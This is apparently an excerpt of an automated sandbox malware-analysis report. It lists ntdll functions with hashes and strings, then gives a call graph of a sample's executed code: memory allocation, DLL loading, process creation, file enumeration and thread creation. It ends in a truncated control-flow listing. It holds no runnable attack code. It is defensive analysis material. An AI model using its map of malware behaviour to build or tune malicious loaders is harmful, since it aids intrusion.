                                          • Opcode Fuzzy Hash: 6eca472afc436e3e7e49f3fdd6941b7dffe4d424cd3824fdb87811111e2e229b
                                          • Instruction Fuzzy Hash: 5AE18C746083429FE710CF24C884B5AB7E6BF88368F404E6DE895AF291D771E945CF92
                                          Function 3779F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: 65d5ff2aa831447317ad30160ed4dc540223edd12c64918d67476c56f8f46275
                                          • Instruction ID: a9814ed79fe28eff643d1af5a409b75a112f5bd6dede25be18acfae6854cfaf8
                                          • Opcode Fuzzy Hash: 65d5ff2aa831447317ad30160ed4dc540223edd12c64918d67476c56f8f46275
                                          • Instruction Fuzzy Hash: 28912135902645DFDB01CFA4D850BEDBBF2FF4A320F14886AE444AF651CB39A942CB55
                                          Function 376E6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37749843
                                          • minkernel\ntdll\ldrinit.c, xrefs: 37749854, 37749895
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37749885
                                          • LdrpLoadShimEngine, xrefs: 3774984A, 3774988B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: cb70d4ff01228fe7a44c5c9c885e8cb5618fcfdafa481e1cf5a617889c6369f1
                                          • Instruction ID: 02683250521a2ec01b83ccbf19592ae4eb69feaba8d013cda8b97d30ce191613
                                          • Opcode Fuzzy Hash: cb70d4ff01228fe7a44c5c9c885e8cb5618fcfdafa481e1cf5a617889c6369f1
                                          • Instruction Fuzzy Hash: 9B513672B203449FDF00CBA8CCA9BAD77BABB44314F040169E451BF6A5DB789C11CB92
                                          Function 376F9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          • Opcode ID: c05026bcd03022b9770414a0555f419beed4287177b08117c7b35a4c94ff2b0c
                                          • Instruction ID: 4ee5bdaac631b74ee4bddec352727eb80be55708144534fd43bddf3f718426b2
                                          • Opcode Fuzzy Hash: c05026bcd03022b9770414a0555f419beed4287177b08117c7b35a4c94ff2b0c
                                          • Instruction Fuzzy Hash: 73813AB2D002699BDB21CB54CC45BEEB7B8AB08754F0045EAE909BB250D7749E85CFA1
                                          Function 37724C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 37763440, 3776346C
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37763439
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 37763466
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 3776344A, 37763476
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          • Opcode ID: 8539414fd82f3431680979abebe169eb8fd45fd2bfd70e496cbd4824c0ebc1b1
                                          • Instruction ID: fa9eaa57cf4e64aeee20a67d2b4022dcddf83d06f4a9ae79541e607f03db51c7
                                          • Opcode Fuzzy Hash: 8539414fd82f3431680979abebe169eb8fd45fd2bfd70e496cbd4824c0ebc1b1
                                          • Instruction Fuzzy Hash: C7314CB6A00351AFFB11DB0CCC49B25B2A5FB457B4F42846AD8206F170E764ADC0E792
                                          Function 3771EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4f89896e7cf394d7b564aa1416c3153e82b54e09418fc8b329195416a5e3bc1
                                          • Instruction ID: 20a4f9d4408fa06c55990301658e6093555b5632243801f258a2d6e65c1e8311
                                          • Opcode Fuzzy Hash: f4f89896e7cf394d7b564aa1416c3153e82b54e09418fc8b329195416a5e3bc1
                                          • Instruction Fuzzy Hash: 56E102B5D01708CFDB25CFA9C984A9DBBF6FF48320F20492AE545AB661D774A942CF10
                                          Function 377CA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 22062128213513ed5722a4619d85d505700225b6a37e858e97ae66ecabde5343
                                          • Instruction ID: 28a3569204a9f9856fae96a9764435e672e95602d57b373129576d8cfee8c2ce
                                          • Opcode Fuzzy Hash: 22062128213513ed5722a4619d85d505700225b6a37e858e97ae66ecabde5343
                                          • Instruction Fuzzy Hash: BD515C757106139FEB08CE28C8D1A2977F2BB8D3A2B12496DD906DB720DB75AD41CB80
                                          Function 3776EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 71f60d394cd3c888e1da2fd62b24b9cf9b38f07c007f6e1a0a108d27e4749a27
                                          • Instruction ID: 04023e667f5e6e09d07f769dfd01847a39ba8d12137e9d04530878929632d6b1
                                          • Opcode Fuzzy Hash: 71f60d394cd3c888e1da2fd62b24b9cf9b38f07c007f6e1a0a108d27e4749a27
                                          • Instruction Fuzzy Hash: 345124B6E11219DFEF04CF95C948ADDBBB2BF48358F14812AE805BB254D774A901CF60
                                          Function 376EE67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ^n7
                                          • API String ID: 3446177414-3868608643
                                          • Opcode ID: 825d7736c737fa5aaba7e7684e10cd51cecc072512c48b0156c1d27326aa7778
                                          • Instruction ID: e2094b1e727dfd104276c4d6ebbd2ad8d3f7c2e7a5bb5e8bb88cfbc545748822
                                          • Opcode Fuzzy Hash: 825d7736c737fa5aaba7e7684e10cd51cecc072512c48b0156c1d27326aa7778
                                          • Instruction Fuzzy Hash: F641AFB9A01201DFEB05CF29C4905697BFAFF89720B10847AEC08DB760DB35E851CBA1
                                          Function 376EDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872
                                          • Opcode ID: a91deb42993e6e1cca9849d81a923886c9bbb5472b4357453beba8e7708dc01e
                                          • Instruction ID: 4debbd2ad1d977ab3fae8977d89b55e38ca96f254ab0c11c54d4c11f4870c439
                                          • Opcode Fuzzy Hash: a91deb42993e6e1cca9849d81a923886c9bbb5472b4357453beba8e7708dc01e
                                          • Instruction Fuzzy Hash: 10419DB5609701AFD300CF28C554A5ABBE8FB88354F044A2EF988EB741D731EA05CF96

                                          Execution Graph

                                          Execution Coverage:2.7%
                                          Dynamic/Decrypted Code Coverage:4.3%
                                          Signature Coverage:0.7%
                                          Total number of Nodes:447
                                          Total number of Limit Nodes:71
                                          execution_graph 92346 3105390 92347 31053a6 92346->92347 92352 3117290 92347->92352 92351 31053db 92353 31172aa 92352->92353 92361 50c2b2a 92353->92361 92354 31053c6 92356 3117c80 92354->92356 92357 3117d04 92356->92357 92359 3117ca4 92356->92359 92364 50c2da0 LdrInitializeThunk 92357->92364 92358 3117d35 92358->92351 92359->92351 92362 50c2b3f LdrInitializeThunk 92361->92362 92363 50c2b31 92361->92363 92362->92354 92363->92354 92364->92358 92365 310ba90 92366 310bab9 92365->92366 92367 310bbbd 92366->92367 92368 310bb63 FindFirstFileW 92366->92368 92368->92367 92369 310bb7e 92368->92369 92370 310bba4 FindNextFileW 92369->92370 92370->92369 92371 310bbb6 FindClose 92370->92371 92371->92367 92372 3116c10 92373 3116c2d 92372->92373 92374 3116c3e RtlDosPathNameToNtPathName_U 92373->92374 92375 3114410 92376 311446a 92375->92376 92378 3114477 92376->92378 92379 3106c40 92376->92379 92381 3106c00 92379->92381 92380 3106c32 92380->92378 92381->92380 92383 310a7f0 92381->92383 92384 310a816 92383->92384 92385 310aa35 92384->92385 92410 3117fd0 92384->92410 92385->92380 92387 310a88c 92387->92385 92413 311acf0 92387->92413 92389 310a8a8 92389->92385 92390 310a979 92389->92390 92391 3117290 LdrInitializeThunk 92389->92391 92392 3105280 LdrInitializeThunk 92390->92392 92394 310a998 92390->92394 92393 310a904 92391->92393 92392->92394 92393->92390 92398 310a90d 92393->92398 92399 310aa1d 92394->92399 92427 3116e60 92394->92427 92395 310a961 92423 3107750 92395->92423 92397 310a93f 92442 3113450 LdrInitializeThunk 92397->92442 92398->92385 92398->92395 92398->92397 92419 3105280 92398->92419 92401 3107750 LdrInitializeThunk 92399->92401 92405 310aa2b 92401->92405 92405->92380 92406 310a9f4 92432 3116f00 92406->92432 92408 310aa0e 92437 3117040 92408->92437 92411 3117fea 92410->92411 92412 3117ffb CreateProcessInternalW 92411->92412 92412->92387 92414 311ac60 92413->92414 92417 311acbd 92414->92417 92443 3119bc0 92414->92443 92416 311ac9a 92446 3119ae0 92416->92446 92417->92389 92420 31052aa 92419->92420 92455 3117450 92420->92455 92422 31052be 92422->92397 92424 3107763 92423->92424 92461 31171a0 92424->92461 92426 310778e 92426->92380 92428 3116ecf 92427->92428 92429 3116e81 92427->92429 92467 50c38d0 LdrInitializeThunk 92428->92467 92429->92406 92430 3116ef4 92430->92406 92433 3116f6f 92432->92433 92434 3116f21 92432->92434 92468 50c4260 LdrInitializeThunk 92433->92468 92434->92408 92435 3116f94 92435->92408 92438 31170b2 92437->92438 92440 3117064 92437->92440 92469 50c2ed0 LdrInitializeThunk 92438->92469 92439 31170d7 92439->92399 92440->92399 92442->92395 92449 3117ef0 92443->92449 92445 3119bdb 92445->92416 92452 3117f40 92446->92452 92448 3119af9 92448->92417 92450 3117f0d 92449->92450 92451 3117f1e RtlAllocateHeap 92450->92451 92451->92445 92453 3117f5a 92452->92453 92454 3117f6b RtlFreeHeap 92453->92454 92454->92448 92456 31174f2 92455->92456 92457 3117474 92455->92457 92460 50c2c30 LdrInitializeThunk 92456->92460 92457->92422 92458 3117537 92458->92422 92460->92458 92462 3117213 92461->92462 92464 31171c4 92461->92464 92466 50c2cf0 LdrInitializeThunk 92462->92466 92463 3117238 92463->92426 92464->92426 92466->92463 92467->92430 92468->92435 92469->92439 92470 3114c10 92471 3114c6a 92470->92471 92473 3114c77 92471->92473 92474 31127a0 92471->92474 92481 3119a50 92474->92481 92476 31128e6 92476->92473 92477 31127e1 92477->92476 92484 3104050 92477->92484 92479 3112860 Sleep 92480 3112827 92479->92480 92480->92476 92480->92479 92488 3117d40 92481->92488 92483 3119a81 92483->92477 92485 3104074 92484->92485 92486 31040b0 LdrLoadDll 92485->92486 92487 310407b 92485->92487 92486->92487 92487->92480 92489 3117dca 92488->92489 92491 3117d64 92488->92491 92490 3117de0 NtAllocateVirtualMemory 92489->92490 92490->92483 92491->92483 92497 31022da 92500 3105b70 92497->92500 92499 3102313 92501 3105ba3 92500->92501 92502 3105bc7 92501->92502 92507 3117790 92501->92507 92502->92499 92504 3105bea 92504->92502 92511 3117bf0 92504->92511 92506 3105c6a 92506->92499 92508 31177aa 92507->92508 92514 50c2bc0 LdrInitializeThunk 92508->92514 92509 31177d6 92509->92504 92512 3117c0a 92511->92512 92513 3117c1b NtClose 92512->92513 92513->92506 92514->92509 92517 30f9440 92518 30f9879 92517->92518 92520 30f9d08 92518->92520 92521 3119770 92518->92521 92522 3119796 92521->92522 92527 30f3e50 92522->92527 92524 31197a2 92525 31197d0 92524->92525 92531 3114250 92524->92531 92525->92520 92528 30f3e57 92527->92528 92535 3102d80 92528->92535 92530 30f3e5d 92530->92524 92532 31142aa 92531->92532 92534 31142b7 92532->92534 92546 3101220 92532->92546 92534->92525 92536 3102d97 92535->92536 92538 3102db0 92536->92538 92539 3118640 92536->92539 92538->92530 92541 3118658 92539->92541 92540 311867c 92540->92538 92541->92540 92542 3117290 LdrInitializeThunk 92541->92542 92543 31186d1 92542->92543 92544 3119ae0 RtlFreeHeap 92543->92544 92545 31186ea 92544->92545 92545->92538 92547 310125b 92546->92547 92562 31074e0 92547->92562 92549 3101263 92550 3101523 92549->92550 92551 3119bc0 RtlAllocateHeap 92549->92551 92550->92534 92552 3101279 92551->92552 92553 3119bc0 RtlAllocateHeap 92552->92553 92554 310128a 92553->92554 92555 3119bc0 RtlAllocateHeap 92554->92555 92557 310129b 92555->92557 92561 3101322 92557->92561 92577 31062d0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 92557->92577 92558 3104050 LdrLoadDll 92559 31014e3 92558->92559 92573 3116970 92559->92573 92561->92558 92563 310750c 92562->92563 92578 31073d0 92563->92578 92566 3107539 92568 3117bf0 NtClose 92566->92568 92571 3107544 92566->92571 92567 310756d 92567->92549 92568->92571 92569 3107551 92569->92567 92570 3117bf0 NtClose 92569->92570 92572 3107563 92570->92572 92571->92549 92572->92549 92574 31169ca 92573->92574 92576 31169d7 92574->92576 92589 3101540 92574->92589 92576->92550 92577->92561 92579 31074c6 92578->92579 92580 31073ea 92578->92580 92579->92566 92579->92569 92584 3117330 92580->92584 92583 3117bf0 NtClose 92583->92579 92585 311734a 92584->92585 92588 50c34e0 LdrInitializeThunk 92585->92588 92586 31074ba 92586->92583 92588->92586 92591 3101560 92589->92591 92605 31077b0 92589->92605 92598 3101a45 92591->92598 92609 3110400 92591->92609 92594 3101761 92595 311acf0 2 API calls 92594->92595 92599 3101776 92595->92599 92596 31015be 92596->92598 92612 311abc0 92596->92612 92597 3107750 LdrInitializeThunk 92601 31017a1 92597->92601 92598->92576 92599->92601 92617 31001e0 92599->92617 92601->92597 92601->92598 92602 31001e0 LdrInitializeThunk 92601->92602 92602->92601 92603 31018cf 92603->92601 92604 3107750 LdrInitializeThunk 92603->92604 92604->92603 92606 31077bd 92605->92606 92607 31077e5 92606->92607 92608 31077de SetErrorMode 92606->92608 92607->92591 92608->92607 92610 3119a50 NtAllocateVirtualMemory 92609->92610 92611 3110421 92609->92611 92610->92611 92611->92596 92613 311abd0 92612->92613 92614 311abd6 92612->92614 92613->92594 92615 3119bc0 RtlAllocateHeap 92614->92615 92616 311abfc 92615->92616 92616->92594 92618 3100202 92617->92618 92620 3117e60 92617->92620 92618->92603 92621 3117e7d 92620->92621 92624 50c2b90 LdrInitializeThunk 92621->92624 92622 3117ea5 92622->92618 92624->92622 92625 3105300 92626 3107750 LdrInitializeThunk 92625->92626 92627 3105330 92626->92627 92629 310537a 92627->92629 92630 310535c 92627->92630 92631 31076d0 92627->92631 92632 3107714 92631->92632 92633 3107735 92632->92633 92638 3116fa0 92632->92638 92633->92627 92635 3107725 92636 3107741 92635->92636 92637 3117bf0 NtClose 92635->92637 92636->92627 92637->92633 92639 3117012 92638->92639 92640 3116fc4 92638->92640 92643 50c4570 LdrInitializeThunk 92639->92643 92640->92635 92641 3117037 92641->92635 92643->92641 92644 31105c1 92656 3117a80 92644->92656 92646 31105e2 92647 3110600 92646->92647 92648 3110615 92646->92648 92649 3117bf0 NtClose 92647->92649 92650 3117bf0 NtClose 92648->92650 92651 3110609 92649->92651 92653 311061e 92650->92653 92652 311064a 92653->92652 92654 3119ae0 RtlFreeHeap 92653->92654 92655 311063e 92654->92655 92657 3117b19 92656->92657 92659 3117aa1 92656->92659 92658 3117b2f NtReadFile 92657->92658 92658->92646 92659->92646 92660 310f440 92661 310f45d 92660->92661 92662 3104050 LdrLoadDll 92661->92662 92663 310f47b 92662->92663 92669 3110dc0 92670 3110dcf 92669->92670 92671 3110e59 92670->92671 92672 3110e13 92670->92672 92675 3110e54 92670->92675 92673 3119ae0 RtlFreeHeap 92672->92673 92674 3110e23 92673->92674 92676 3119ae0 RtlFreeHeap 92675->92676 92676->92671 92677 3117240 92678 311725a 92677->92678 92681 50c2d10 LdrInitializeThunk 92678->92681 92679 3117282 92681->92679 92682 310920b 92683 310921a 92682->92683 92684 3119ae0 RtlFreeHeap 92683->92684 92685 3109221 92683->92685 92684->92685 92687 30fb052 92688 3119a50 NtAllocateVirtualMemory 92687->92688 92689 30fc6c1 92688->92689 92690 31069f0 92691 3106a0c 92690->92691 92695 3106a5f 92690->92695 92693 3117bf0 NtClose 92691->92693 92691->92695 92692 3106b85 92694 3106a27 92693->92694 92700 3105e00 NtClose LdrInitializeThunk LdrInitializeThunk 92694->92700 92695->92692 92701 3105e00 NtClose LdrInitializeThunk LdrInitializeThunk 92695->92701 92697 3106b5f 92697->92692 92702 3105fd0 NtClose LdrInitializeThunk LdrInitializeThunk 92697->92702 92700->92695 92701->92697 92702->92692 92703 310a2f0 92708 310a020 92703->92708 92705 310a2fd 92722 3109cc0 92705->92722 92707 310a319 92709 310a045 92708->92709 92733 31079a0 92709->92733 92712 310a182 92712->92705 92714 310a199 92714->92705 92715 310a190 92715->92714 92717 310a281 92715->92717 92748 3109720 92715->92748 92718 310a2d9 92717->92718 92757 3109a80 92717->92757 92720 3119ae0 RtlFreeHeap 92718->92720 92721 310a2e0 92720->92721 92721->92705 92723 3109cd6 92722->92723 92730 3109ce1 92722->92730 92724 3119bc0 RtlAllocateHeap 92723->92724 92724->92730 92725 3109cf7 92725->92707 92726 31079a0 GetFileAttributesW 92726->92730 92727 3109fee 92728 310a007 92727->92728 92729 3119ae0 RtlFreeHeap 92727->92729 92728->92707 92729->92728 92730->92725 92730->92726 92730->92727 92731 3109720 RtlFreeHeap 92730->92731 92732 3109a80 RtlFreeHeap 92730->92732 92731->92730 92732->92730 92734 31079c1 92733->92734 92735 31079c8 GetFileAttributesW 92734->92735 92736 31079d3 92734->92736 92735->92736 92736->92712 92737 3112080 92736->92737 92738 311208e 92737->92738 92739 3112095 92737->92739 92738->92715 92740 3104050 LdrLoadDll 92739->92740 92741 31120ca 92740->92741 92742 31120d9 92741->92742 92761 3111b60 LdrLoadDll 92741->92761 92744 3119bc0 RtlAllocateHeap 92742->92744 92747 3112271 92742->92747 92746 31120f2 92744->92746 92745 3119ae0 RtlFreeHeap 92745->92747 92746->92745 92746->92747 92747->92715 92749 3109746 92748->92749 92762 310cf60 92749->92762 92751 31097ad 92752 31097cb 92751->92752 92753 310992a 92751->92753 92754 310990f 92752->92754 92767 31095e0 92752->92767 92753->92754 92756 31095e0 RtlFreeHeap 92753->92756 92754->92715 92756->92753 92758 3109aa6 92757->92758 92759 310cf60 RtlFreeHeap 92758->92759 92760 3109b22 92759->92760 92760->92717 92761->92742 92764 310cf76 92762->92764 92763 310cf83 92763->92751 92764->92763 92765 3119ae0 RtlFreeHeap 92764->92765 92766 310cfbc 92765->92766 92766->92751 92768 31095f6 92767->92768 92771 310cfd0 92768->92771 92770 31096fc 92770->92752 92772 310cff4 92771->92772 92773 310d08c 92772->92773 92774 3119ae0 RtlFreeHeap 92772->92774 92773->92770 92774->92773 92775 3110a30 92776 3110a4c 92775->92776 92777 3110a74 92776->92777 92778 3110a88 92776->92778 92779 3117bf0 NtClose 92777->92779 92780 3117bf0 NtClose 92778->92780 92781 3110a7d 92779->92781 92782 3110a91 92780->92782 92785 3119c00 RtlAllocateHeap 92782->92785 92784 3110a9c 92785->92784 92786 3102c7c 92787 31073d0 2 API calls 92786->92787 92788 3102c8c 92787->92788 92789 3117bf0 NtClose 92788->92789 92790 3102ca1 92788->92790 92789->92790 92791 30f93e0 92792 30f93ef 92791->92792 92793 30f9430 92792->92793 92794 30f941d CreateThread 92792->92794 92795 310eb60 92796 310ebc4 92795->92796 92797 3105b70 2 API calls 92796->92797 92799 310eced 92797->92799 92798 310ecf4 92799->92798 92824 3105c80 92799->92824 92801 310ed70 92802 310eea2 92801->92802 92822 310ee93 92801->92822 92828 310e940 92801->92828 92804 3117bf0 NtClose 92802->92804 92806 310eeac 92804->92806 92805 310eda5 92805->92802 92807 310edb0 92805->92807 92808 3119bc0 RtlAllocateHeap 92807->92808 92809 310edd9 92808->92809 92810 310ede2 92809->92810 92811 310edf8 92809->92811 92812 3117bf0 NtClose 92810->92812 92837 310e830 CoInitialize 92811->92837 92814 310edec 92812->92814 92815 310ee06 92839 31176f0 92815->92839 92817 310ee82 92818 3117bf0 NtClose 92817->92818 92819 310ee8c 92818->92819 92821 3119ae0 RtlFreeHeap 92819->92821 92820 310ee24 92820->92817 92823 31176f0 LdrInitializeThunk 92820->92823 92821->92822 92823->92820 92825 3105ca5 92824->92825 92843 3117590 92825->92843 92829 310e95c 92828->92829 92830 3104050 LdrLoadDll 92829->92830 92832 310e97a 92830->92832 92831 310e983 92831->92805 92832->92831 92833 3104050 LdrLoadDll 92832->92833 92834 310ea4e 92833->92834 92835 3104050 LdrLoadDll 92834->92835 92836 310eaa8 92834->92836 92835->92836 92836->92805 92838 310e895 92837->92838 92838->92815 92840 311770a 92839->92840 92848 50c2ac0 LdrInitializeThunk 92840->92848 92841 311773a 92841->92820 92844 31175ad 92843->92844 92847 50c2b80 LdrInitializeThunk 92844->92847 92845 3105d19 92845->92801 92847->92845 92848->92841 92849 3106620 92850 310664a 92849->92850 92853 3107580 92850->92853 92852 3106674 92854 310759d 92853->92854 92860 3117380 92854->92860 92856 31075ed 92857 31075f4 92856->92857 92858 3117450 LdrInitializeThunk 92856->92858 92857->92852 92859 310761d 92858->92859 92859->92852 92861 311740d 92860->92861 92862 31173a1 92860->92862 92865 50c2e50 LdrInitializeThunk 92861->92865 92862->92856 92863 3117446 92863->92856 92865->92863 92866 3100660 92867 310067a 92866->92867 92868 3104050 LdrLoadDll 92867->92868 92869 3100698 92868->92869 92870 31006cc PostThreadMessageW 92869->92870 92871 31006dd 92869->92871 92870->92871 92872 3117b60 92873 3117b81 92872->92873 92874 3117bc9 92872->92874 92875 3117bdf NtDeleteFile 92874->92875 92876 3117920 92877 31179c9 92876->92877 92879 3117945 92876->92879 92878 31179df NtCreateFile 92877->92878 92885 311ac20 92886 3119ae0 RtlFreeHeap 92885->92886 92887 311ac35 92886->92887 92888 31170e0 92889 3117161 92888->92889 92891 3117101 92888->92891 92893 50c2e00 LdrInitializeThunk 92889->92893 92890 3117192 92893->92890 92894 50c29f0 LdrInitializeThunk 92895 3107e2e 92896 3107d86 92895->92896 92896->92895 92897 3107dd3 92896->92897 92899 3106840 LdrInitializeThunk LdrInitializeThunk 92896->92899 92899->92896

                                          Executed Functions

                                          Function 030F9440 Relevance: 40.4, Strings: 32, Instructions: 448COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 26 30f9440-30f986f 27 30f9879-30f9880 26->27 28 30f98b7-30f98c8 27->28 29 30f9882-30f98b5 27->29 30 30f98d9-30f98e2 28->30 29->27 31 30f98f5-30f98ff 30->31 32 30f98e4-30f98f3 30->32 34 30f9910-30f991c 31->34 32->30 35 30f991e-30f9931 34->35 36 30f9933-30f994b 34->36 35->34 38 30f995c-30f9963 36->38 39 30f998c-30f99a5 38->39 40 30f9965-30f998a 38->40 39->39 42 30f99a7-30f99c0 39->42 40->38 42->42 43 30f99c2-30f99cc 42->43 44 30f99dd-30f99e9 43->44 45 30f99eb-30f99f7 44->45 46 30f9a07-30f9a20 44->46 48 30f99f9-30f99ff 45->48 49 30f9a05 45->49 46->46 47 30f9a22-30f9a2c 46->47 51 30f9a3d-30f9a49 47->51 48->49 49->44 52 30f9a4b-30f9a5e 51->52 53 30f9a60-30f9a6a 51->53 52->51 54 30f9a7b-30f9a87 53->54 56 30f9a89-30f9a95 54->56 57 30f9a97-30f9aa0 54->57 56->54 58 30f9bea-30f9c07 57->58 59 30f9aa6-30f9abe 57->59 61 30f9c18-30f9c24 58->61 62 30f9b3f-30f9b49 59->62 63 30f9ac0-30f9aca 59->63 65 30f9c3a-30f9c44 61->65 66 30f9c26-30f9c38 61->66 64 30f9b5a-30f9b63 62->64 67 30f9adb-30f9ae5 63->67 69 30f9b7b-30f9b8f 64->69 70 30f9b65-30f9b6e 64->70 71 30f9c55-30f9c61 65->71 66->61 72 30f9afb-30f9b05 67->72 73 30f9ae7-30f9af9 67->73 78 30f9ba0-30f9baa 69->78 76 30f9b79 70->76 77 30f9b70-30f9b73 70->77 79 30f9c7f-30f9c89 71->79 80 30f9c63-30f9c6f 71->80 74 30f9b16-30f9b22 72->74 73->67 83 30f9b3a 74->83 84 30f9b24-30f9b2d 74->84 76->64 77->76 81 